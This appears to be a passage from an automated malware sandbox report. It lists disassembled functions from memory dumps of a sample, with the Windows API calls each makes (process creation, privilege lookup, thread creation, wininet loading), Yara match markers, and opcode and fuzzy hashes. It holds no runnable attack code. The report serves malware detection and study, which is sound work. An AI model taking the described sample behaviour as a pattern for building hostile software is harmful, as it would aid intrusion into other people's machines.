                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 57d24618a62cb03209f7c20be95079ff4dd194d4b3b8ae9cd35aacbc8b77ee60
                                                                                            • Instruction ID: ce1789715aade73f5dd6c565228d80555f1693954bdab4bdcdbc8a72c65dfa1c
                                                                                            • Opcode Fuzzy Hash: 57d24618a62cb03209f7c20be95079ff4dd194d4b3b8ae9cd35aacbc8b77ee60
                                                                                            • Instruction Fuzzy Hash: 3890027520110413D51571598544B17002997D0281FD1C822E045455CD96968952B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f3d70704344fafc565610bee407c320affd2b9510db4fecee1edef100a290db9
                                                                                            • Instruction ID: 23528b55228d696d528e91dd3809e3566eb8262b7608553b5517391dcae549ce
                                                                                            • Opcode Fuzzy Hash: f3d70704344fafc565610bee407c320affd2b9510db4fecee1edef100a290db9
                                                                                            • Instruction Fuzzy Hash: CF900265242141525949B15984449174026A7E02817D1C422E1444954C85669856E661
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 15eff03563a24ab8e7ecc412c10baebff86ec2dd8276d4025c76bf09ef05672c
                                                                                            • Instruction ID: 4754b93f8c9e664867dcec76e673e43a3b0937e5f8e00ecc66279adbbe1b45ab
                                                                                            • Opcode Fuzzy Hash: 15eff03563a24ab8e7ecc412c10baebff86ec2dd8276d4025c76bf09ef05672c
                                                                                            • Instruction Fuzzy Hash: C090027520110402D50475999448A56002597E0341F91D421E5054559EC6A588917171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 037660135e2804f5ff92111a96b43ac1fcb275828106b3b04d3a1271ffb18579
                                                                                            • Instruction ID: 961f8eaf9df55c41a632c42f39deced9fc7adeb2f837242bb31d1a59d630bc0a
                                                                                            • Opcode Fuzzy Hash: 037660135e2804f5ff92111a96b43ac1fcb275828106b3b04d3a1271ffb18579
                                                                                            • Instruction Fuzzy Hash: D190026524110802D5447159C454B170026D7D0641F91C421E0054558D8656896576F1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9a2cd23cd2221af24e1c3477488d2356c811959d87cb40e834f90f5328a286a5
                                                                                            • Instruction ID: 1f93d1d5a2829ac551c66ac84b29de8e7da8760cd1a63ffdb44168114480f113
                                                                                            • Opcode Fuzzy Hash: 9a2cd23cd2221af24e1c3477488d2356c811959d87cb40e834f90f5328a286a5
                                                                                            • Instruction Fuzzy Hash: 9F90026D21310002D58471599448A1A002597D1242FD1D825E004555CCC95588696361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 144d651f71cdb6fb154f940836cd75ab72c9c6d493b7d94ecfabf5e32c98a054
                                                                                            • Instruction ID: 2c64c553b0a16ceca6a8eb3068cbd049e4d4ad11e97bf4418d4df78053a6dd24
                                                                                            • Opcode Fuzzy Hash: 144d651f71cdb6fb154f940836cd75ab72c9c6d493b7d94ecfabf5e32c98a054
                                                                                            • Instruction Fuzzy Hash: B790027531124402D5147159C444B16002597D1241F91C821E085455CD86D588917162
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379610, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0878789f600d2438a20b810a0514b63671e8275efd0d7d96fe43644630ced9a5
                                                                                            • Instruction ID: 2a6017ef6311b3d6131bd43744ec9dafae0b458f15489ae9eb836ba316f71a87
                                                                                            • Opcode Fuzzy Hash: 0878789f600d2438a20b810a0514b63671e8275efd0d7d96fe43644630ced9a5
                                                                                            • Instruction Fuzzy Hash: B590027560510802D55471598454B56002597D0341F91C421E0054658D87958A5576E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: dd4a6210a6db87529aca49bf79162dc6b58d9de8d487c8267fb1f2537b7da827
                                                                                            • Instruction ID: e98cd7f9fa632938351f237863229550265d80cdfdf3d87f0d1612b708654848
                                                                                            • Opcode Fuzzy Hash: dd4a6210a6db87529aca49bf79162dc6b58d9de8d487c8267fb1f2537b7da827
                                                                                            • Instruction Fuzzy Hash: 2490027520110802D58471598444A5A002597D1341FD1C425E0055658DCA558A5977E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 89bfe032682896df32543c74539fb4c5bae253651ac456ca0058439be009a9c4
                                                                                            • Instruction ID: 86d9e48f3e8d8b492410afca17ad33da132a26ab377b14e96f9ad920ef457d90
                                                                                            • Opcode Fuzzy Hash: 89bfe032682896df32543c74539fb4c5bae253651ac456ca0058439be009a9c4
                                                                                            • Instruction Fuzzy Hash: B590026521190042D60475698C54F17002597D0343F91C525E0184558CC95588616561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6cdd7211508a18fe2cfdd3fbec722edd24ca35b41de9f0a10de8f67bf27beedb
                                                                                            • Instruction ID: 4b8c5ecf70a58533494f48def8b5c3fa29042fb131b3bf4a5b5394ee4d92dda3
                                                                                            • Opcode Fuzzy Hash: 6cdd7211508a18fe2cfdd3fbec722edd24ca35b41de9f0a10de8f67bf27beedb
                                                                                            • Instruction Fuzzy Hash: 2B90027520514842D54471598444E56003597D0345F91C421E0094698D96658D55B6A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 053796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5ddaf5dac47445f2243a3a24d5e429195d85bcf9ffa12559bbe8597a2f868525
                                                                                            • Instruction ID: e16ce3329bc1847f902e921a5ca0962a374d8114d582a49f2855315f5a8490bd
                                                                                            • Opcode Fuzzy Hash: 5ddaf5dac47445f2243a3a24d5e429195d85bcf9ffa12559bbe8597a2f868525
                                                                                            • Instruction Fuzzy Hash: 2090027520118802D5147159C444B5A002597D0341F95C821E445465CD86D588917161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 053796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: edb5af9f49b6b523ca0159de4413e88a7b6bc49ca13f15f1d4062392d3a0e5ef
                                                                                            • Instruction ID: b78e5236b2ae01ca2e23585b24c968568ea4cdf06198e28801adb01251377fd5
                                                                                            • Opcode Fuzzy Hash: edb5af9f49b6b523ca0159de4413e88a7b6bc49ca13f15f1d4062392d3a0e5ef
                                                                                            • Instruction Fuzzy Hash: 9690027520110842D50471598444F56002597E0341F91C426E0154658D8655C8517561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01067310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: 19fac6c6d9d19817078639699de6516aba48ff98aa28ccd64e356128316098ac
                                                                                            • Instruction ID: 97e0ab974829f76ed8d361503e9b96fa3d8f65411de5ee832067a0be946cd39d
                                                                                            • Opcode Fuzzy Hash: 19fac6c6d9d19817078639699de6516aba48ff98aa28ccd64e356128316098ac
                                                                                            • Instruction Fuzzy Hash: CE318FB6601601ABD711EF68C8A1FABB7F8BF48704F00815DFA595B241D770B545CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01067308, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: 1ed6dcf01f551c87c967d86367b8ae0a13177988fea3a6455148ccbbd445139c
                                                                                            • Instruction ID: 265ebe804630db9ce94132ff0b6861a8709a97e6d569dde722673ee97287a39f
                                                                                            • Opcode Fuzzy Hash: 1ed6dcf01f551c87c967d86367b8ae0a13177988fea3a6455148ccbbd445139c
                                                                                            • Instruction Fuzzy Hash: CC21CEB1601201ABD710EF68C8A1FABBBF8BF48704F008169FA999B241D770A545CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01067435, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0105CD00,?,?), ref: 0106747C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID: net.dll
                                                                                            • API String ID: 2422867632-2431746569
                                                                                            • Opcode ID: a1308e0096f33b5751fbdfdda36fc6749f92ddc7a189da5e05ec393b04e51ef6
                                                                                            • Instruction ID: 46d1d689648449d67fc9937d247b8d4e1b6010add57d5895cf15394f79285b8d
                                                                                            • Opcode Fuzzy Hash: a1308e0096f33b5751fbdfdda36fc6749f92ddc7a189da5e05ec393b04e51ef6
                                                                                            • Instruction Fuzzy Hash: 7911D67760160067D3329A68CC22FA7B79CEB95714F04855EFA8AAB280D775B80587E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01068900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01053B93), ref: 0106892D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID: .z`
                                                                                            • API String ID: 3298025750-1441809116
                                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                            • Instruction ID: 0d6ee027db2fd593b6b6d1aa0ab05da673a5b0cd91c7fd8ede0047d39d45ef1c
                                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                            • Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC88EA777ACAF88750F118558BE085B242C630E910CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010688FE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01053B93), ref: 0106892D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID: .z`
                                                                                            • API String ID: 3298025750-1441809116
                                                                                            • Opcode ID: d997ba3557c67c368624f3792eb5eb9a6fc14c243195e45faf5b1429bb4dd091
                                                                                            • Instruction ID: 14152a77e97f063f0f63322e28e379131946e0efa9008e103b1c19dca42b0fec
                                                                                            • Opcode Fuzzy Hash: d997ba3557c67c368624f3792eb5eb9a6fc14c243195e45faf5b1429bb4dd091
                                                                                            • Instruction Fuzzy Hash: 5EE086B45042455FD710FF59D88189B77D9BF81214B11855EEC9947702D131E529CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01061770, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000,00000000,01053AC6,00000000), ref: 01061787
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID: @J7<
                                                                                            • API String ID: 2538663250-2016760708
                                                                                            • Opcode ID: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                            • Instruction ID: bc66c534a356d84e6be5aaca84f3e47b3327b5c16861081958a116f261653a96
                                                                                            • Opcode Fuzzy Hash: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                            • Instruction Fuzzy Hash: D1312FB5A0060A9FDB00DFD8C8809EFB7BDFF88304B108559E556EB214D775EE058BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01057290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010572EA
                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0105730B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                                                            • Instruction ID: 6f627b298534a9ae2b13e1f5d3854fc5085b09bac7251018818ed7eb9bc7b3a3
                                                                                            • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                                                            • Instruction Fuzzy Hash: F901F231A80229BBFB21B6948C02FFF776C9B10B50F044018FF44BA1C1E694690643F6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01059B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01059BC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                            • Instruction ID: ee775deb76b7c3b2a55a8b21a3202946f2effcb7b2318383b6da8e736563145d
                                                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                            • Instruction Fuzzy Hash: E6011EB5E0020EABEB50EBE4DD41FDEB7B89B54208F004195ED48A7241F675EB14CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01068A52, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0105CFD2,0105CFD2,?,00000000,?,?), ref: 01068A90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: b04ae20c4cddd3a204b16d5d03f2915268cde6a6d0f59f0e086613eb4c6c266d
                                                                                            • Instruction ID: ae219b4c1f2377a1241b6544496e324052b7e30db811ac3cf4dee8a28a88a6fb
                                                                                            • Opcode Fuzzy Hash: b04ae20c4cddd3a204b16d5d03f2915268cde6a6d0f59f0e086613eb4c6c266d
                                                                                            • Instruction Fuzzy Hash: 2AF081B12002046FDB14EF68DC89DEB77ACEF85210F108559FD495B242D931E91187F1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01068970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 010689C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                            • Instruction ID: d9543aae23493a2280fde033008bc392f8716058deb8e25f40f920875189e6af
                                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                            • Instruction Fuzzy Hash: 3101AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0106896E, Relevance: 1.5, APIs: 1, Instructions: 40processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 010689C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: ad638e8dbe04d9d9c9b8a6a8cf36ff4e78683ec4a7afc367c90f32d46db5acf6
                                                                                            • Instruction ID: cca0e0552490f7c2a24b60f58c4c48c63448fa0423fd11069d187f002dfbf143
                                                                                            • Opcode Fuzzy Hash: ad638e8dbe04d9d9c9b8a6a8cf36ff4e78683ec4a7afc367c90f32d46db5acf6
                                                                                            • Instruction Fuzzy Hash: BB01B2B2214149AFCB44DF98DC90DEB7BADAF8C314F258258FE4997251C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01067440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0105CD00,?,?), ref: 0106747C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                                                            • Instruction ID: bc635da6d5d7622aaf0b95e243f3d8bd96bd4dabee1735f02b29a6dd2c53e64e
                                                                                            • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                                                            • Instruction Fuzzy Hash: 27E06D333802143AE230659D9C02FE7B69CDB91B24F140026FA8DEA2C0D995F80142A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010688C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(01063546,?,01063CBF,01063CBF,?,01063546,?,?,?,?,?,00000000,00000000,?), ref: 010688ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                            • Instruction ID: 67b187c91038885c2a4c3c435767a3bad1b591e1ea759aae16d2b80208257f61
                                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                            • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99CC84EA777ACAF88654F118558BE085B242C630F910CAB0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01068A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0105CFD2,0105CFD2,?,00000000,?,?), ref: 01068A90
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                            • Instruction ID: cdd7ee054173e9f4ee57b06aa1a6a1276c55db1398fb533e908027f37297d299
                                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                            • Instruction Fuzzy Hash: 36E01AB1200208ABDB10DF49CC84EE737ADAF88650F118154BE085B241C930E8108BF5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0105D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
